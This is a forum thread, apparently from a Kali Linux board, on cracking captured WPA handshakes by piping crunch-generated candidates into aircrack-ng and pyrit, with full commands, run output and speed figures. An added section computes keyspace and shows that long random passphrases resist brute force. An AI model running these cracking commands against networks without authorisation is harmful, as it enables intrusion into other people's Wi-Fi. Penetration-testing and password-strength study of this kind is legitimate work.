
Thread: Cracking WPA key with crunch | aircrack (almost foolproof but how to speed things up)

  1. #1
    Member
    Join Date
    Jun 2013
    Posts
    43


    Hello guys, I'm not going to discuss handshakes since I guess you all are familiar with airmon, airodump and aireplay and know how to get them.
    That's about the first step in cracking WPA and the easy job. The hard job is to actually crack the WPA key from the capfile.
    I was looking for a method that is foolproof without actually storing a huge wordlist on your desktop (talking about lots and lots of terabytes),
    so I came up with the following:

    # crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap

    (Notice there is a space in the command that shouldn't be there, I guess the forum can't handle a 62-character word.)

    Meaning that crunch is making a list with minimum 0 and maximum 25 characters with alphanumeric small and cap characters that are not stored in a wordlist file.
    The "|" ends the crunch command and then we go to the aircrack command:
    With the bssid of the "victim" (notice you have to be authorised by the victim to do the test) and -w- which specifies the handshake.cap file.


    It took me about 30 minutes to crack the following WPA password: hickmin123 (which is an easy password because there are no caps in the password).
    However, I believe it's almost a foolproof method and with lots of time you are able to crack long passwords.
    Now the real question...

    Does anyone have an idea how to edit my command to speed up the cracking process with a precalculating tool, because that would be the coolest thing :-)
    Please notice I only like to use programs preinstalled in Kali Linux.
    Last edited by leevai; 08-10-2013 at 08:18 AM. Reason: fault in my kali command that needs an edit

  2. #2
    Senior Member
    Join Date
    Mar 2013
    Location
    milano
    Posts
    186
    Hi,
    I'm not an expert, but GPU cracking is faster!!
    My old, simple example with CUDA:
    https://vimeo.com/62995190

  3. #3
    Member
    Join Date
    Jun 2013
    Posts
    43
    Isn't that a method with existing wordlists? I'm looking for a fast method to crack a 12 digit unknown password with a combination of small, caps and numbers, and not-in-dictionary passwords with random combinations.
    Tried to watch the vid but unfortunately the quality of the vid is pretty low and I can't read much of the screens... sorry

  4. #4
    Junior Member
    Join Date
    Mar 2013
    Posts
    27
    crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough

  5. #5
    Senior Member
    Join Date
    Mar 2013
    Location
    milano
    Posts
    186
    Quote Originally Posted by hausoo View Post
    crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough
    @thanks +1 for helping me to explain... I have an extraterrestrial language
    @leevai sorry for the video quality (but it's a partial web-hosting problem)... the source video I uploaded is good quality! However, if you HAVE "cuda-enable", read the response of hausoo's friend... it contains the same question as my video
    Bye
    Last edited by zimmaro; 08-10-2013 at 03:48 PM.

  6. #6
    Member
    Join Date
    Jun 2013
    Posts
    43
    Thanks a lot zimmaro!!

    Quote Originally Posted by zimmaro View Post
    @thanks +1 for helping me to explain... I have an extraterrestrial language
    @leevai sorry for the video quality (but it's a partial web-hosting problem)... the source video I uploaded is good quality! However, if you "cuda-enable", read the response of hausoo's friend
    Bye

  7. #7
    Member
    Join Date
    Jun 2013
    Posts
    43
    Hi hausoo,
    Thanks a lot for the reply! I did a first check and it seems to work fine. Tomorrow I will be doing a test on my home PC as it is a much faster computer.

    Quote Originally Posted by hausoo View Post
    crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough

  8. #8
    Member
    Join Date
    Jun 2013
    Posts
    43
    Is it possible this speeds up about 25%? greetz

  9. #9
    Junior Member
    Join Date
    Mar 2013
    Posts
    27
    Yes, depends on your video card (cuda_cores)

    crack 12 digit unknown passwd

    crunch 12 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough

    crunch+aircrack-ng cpu-only

    HTML Code:
    ~# crunch 12 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng -w - -b xx:xx:xx:xx:xx:xx capture-03.cap
    Crunch will now generate the following amount of data: 12018631630886850560 bytes
    11461860304724 MB
    11193222953 GB
    10930881 TB
    10674 PB
    Crunch will now generate the following number of lines: 16533293572437839872 
    Opening capture-03.cap
    Reading packets, please wait...
    
    
    
                                     Aircrack-ng 1.2 beta1
    
    
                       [00:00:45] 180855 keys tested (4367.42 k/s)
    crunch+pyrit cpu+GPU (cuda 334 cores)
    Code:
    ~# crunch 12 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | pyrit -r capture-03.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough
    Crunch will now generate the following amount of data: 12018631630886850560 bytes
    11461860304724 MB
    11193222953 GB
    10930881 TB
    10674 PB
    Crunch will now generate the following number of lines: 16533293572437839872 
    Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+
    
    Parsing file 'capture-03.cap' (1/1)...
    Parsed 47 packets (47 802.11-packets), got 1 AP(s)
    
    ^CCrunch ending at aaaaaaaajKUl0 23400 PMKs per second.
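
Added example, not part of any poster's message: the keyspace arithmetic behind the two runs in post #9, useful for judging how well a random passphrase holds up at the rates measured there. The line and byte counts in the crunch banner equal 62^12 and 13 x 62^12 reduced modulo 2^64, so the real candidate count is far larger than the banner suggests. Function names are hypothetical, and "k/s" is read as keys per second (an assumption).

```python
import math

U64 = 2 ** 64
SECONDS_PER_YEAR = 365.25 * 24 * 3600

# Figures copied from the crunch banner quoted in post #9.
REPORTED_LINES = 16533293572437839872
REPORTED_BYTES = 12018631630886850560

# Rates copied from post #9; "k/s" is read as keys per second (assumption,
# consistent with 180855 keys tested in 45 seconds).
AIRCRACK_CPU_RATE = 4367.42
PYRIT_GPU_RATE = 23400.0


def keyspace(charset_size, length):
    """Number of candidates of exactly `length` characters."""
    return charset_size ** length


def wrap_u64(n):
    """Value an unsigned 64-bit counter would display for n."""
    return n % U64


def years_to_exhaust(candidates, rate_per_second):
    """Worst-case time to try every candidate at a fixed rate."""
    return candidates / rate_per_second / SECONDS_PER_YEAR


def strength_table(charset_size, lengths, rate_per_second):
    """Rows of (length, entropy in bits, years to exhaust)."""
    rows = []
    for n in lengths:
        bits = n * math.log2(charset_size)
        years = years_to_exhaust(keyspace(charset_size, n), rate_per_second)
        rows.append((n, bits, years))
    return rows


if __name__ == "__main__":
    total = keyspace(62, 12)  # 62-character set, 12 characters
    print("true line count   :", total)
    print("banner lines match:", wrap_u64(total) == REPORTED_LINES)
    print("banner bytes match:", wrap_u64(13 * total) == REPORTED_BYTES)  # 12 chars + newline
    print("CPU years: %.3g" % years_to_exhaust(total, AIRCRACK_CPU_RATE))
    for n, bits, years in strength_table(62, (8, 10, 12, 16), PYRIT_GPU_RATE):
        print("%2d chars  %5.1f bits  %.3g years at the GPU rate" % (n, bits, years))
```

At the GPU rate from the thread, exhausting the 12-character, 62-symbol space takes on the order of billions of years, which is why passphrase length and randomness are the effective defence for WPA-PSK.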

  10. #10
    Quote Originally Posted by leevai View Post
    Code:
    crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap
    (notice there is a space in the command that shouldnt be there, i guess the forum can't handle 62characters word)
    This is a great post. Thanks. Especially pointing out the little vB code issue, most people overlook these small details. You could use CODE syntax to fix it.
